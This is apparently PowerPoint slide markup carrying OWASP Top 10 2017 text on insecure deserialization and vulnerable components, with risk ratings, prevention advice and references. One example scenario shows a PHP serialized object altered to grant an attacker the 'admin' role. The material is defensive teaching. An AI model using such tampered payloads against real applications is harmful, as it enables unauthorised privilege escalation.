                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";</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    i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>An attacker changes the serialized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>object to give themselves admin privileges:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a:4:{i:0;i:1;i:1;s:5:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";i:2;s:5:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}</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1"/>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Cheat Sheet: Deserialization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Proactive Controls: Validate All Inputs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Application Security Verification Standard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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AppSecEU 2016: Surviving the Java Deserialization Apocalypse</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hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>AppSecUSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t> 2017: Friday the 13th JSON Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>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endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId1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CWE-502: Deserialization of Untrusted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Java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>Unmarshaller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t> Security</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OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>AppSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t> Cali 2015: Marshalling Pickles</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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The only safe architectural pattern is not to accept serialized objects from untrusted sources or to use serialization mediums that only permit primitive data types.</a:t>
            </a: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If that is not possible, consider one of more of the following:</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Implementing integrity checks such as digital signatures on any serialized objects to prevent hostile object creation or data tampering.</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Enforcing strict type constraints during deserialization before object creation as the code typically expects a definable set of classes. Bypasses to this technique have been demonstrated, so reliance solely on this is not advisable.</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Isolating and running code that deserializes in low privilege environments when possible.</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Logging deserialization exceptions and failures, such as where the incoming type is not the expected type, or the deserialization throws exceptions.</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Restricting or monitoring incoming and outgoing network connectivity from containers or servers that deserialize.</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Monitoring deserialization, alerting if a user deserializes constantly.</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A8</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Insecure Deserialization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2389945480"/>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Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="110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baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitation of deserialization is somewhat difficult, as off the shelf exploits rarely work without changes or tweaks to the underlying exploit code. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="10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This issue is included in the Top 10 based on an </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>industry survey</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> and not on quantifiable data.</a:t>
                      </a:r>
                    </a:p>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Some tools can discover deserialization flaws, but human assistance is frequently needed to validate the problem. It is expected that prevalence data for deserialization flaws will increase as tooling is developed to help identify and address it. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin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tc>
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The impact of deserialization flaws cannot be understated. These flaws can lead to remote code execution attacks, one of the most serious attacks possible.</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900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The business impact depends on the protection needs of the application and data.</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2097789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spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example Attack Scenarios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Components typically run with the same privileges as the application itself, so flaws in any component can result in serious impact. Such flaws can be accidental (e.g. coding error) or intentional (e.g. backdoor in component). Some example exploitable component vulnerabilities discovered are:</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CVE-2017-5638</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, a Struts 2 remote code execution vulnerability that enables execution of arbitrary code on the server, has been blamed for significant breaches.</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While </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>internet of things (IoT)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> are frequently difficult or impossible to patch, the importance of patching them can be great (e.g. biomedical devices).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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There are automated tools to help attackers find unpatched or misconfigured systems. For example, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shodan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> IoT search engine can help you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>find devices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> that still suffer from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Heartbleed vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> that was patched in April 2014.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>You are likely vulnerable:</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you do not know the versions of all components you use (both client-side and server-side). This includes components you directly use as well as nested dependencies.</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software is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> vulnerable, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>unsupported,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> out of date. This includes the OS, web/application server, database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>management system (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DBMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> applications, APIs and all components, runtime environments, and libraries.</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If you do not scan for vulnerabilities regularly and subscribe to security bulletins related to the components you use.</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you do not fix or upgrade the underlying platform, frameworks, and dependencies in a risk-based, timely fashion. This commonly happens in environments when patching is a monthly or quarterly task under change control, which leaves organizations open to many days or months of unnecessary exposure to fixed vulnerabilities.</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software developers do not test the compatibility of updated, upgraded, or patched libraries.</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you do not secure the components' configurations (see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A6:2017-Security Misconfiguration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:b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r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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Application Security Verification Standard: V1 Architecture, design and threat modelling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OWASP Dependency Check (for Java and .NET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OWASP Testing Guide: Map Application Architecture (OTG-INFO-010)</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Virtual Patching Best Practices</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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The Unfortunate Reality of Insecure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4"/>
              </a:rPr>
              <a:t>MITRE Common Vulnerabilities and Exposures (CVE) search</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5"/>
              </a:rPr>
              <a:t>National Vulnerability Database (NVD)</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6"/>
              </a:rPr>
              <a:t>Retire.js for detecting known vulnerable JavaScript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7"/>
              </a:rPr>
              <a:t>Node Libraries Security Advisories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8"/>
              </a:rPr>
              <a:t>Ruby Libraries Security Advisory Database </a:t>
            </a:r>
            <a:r>
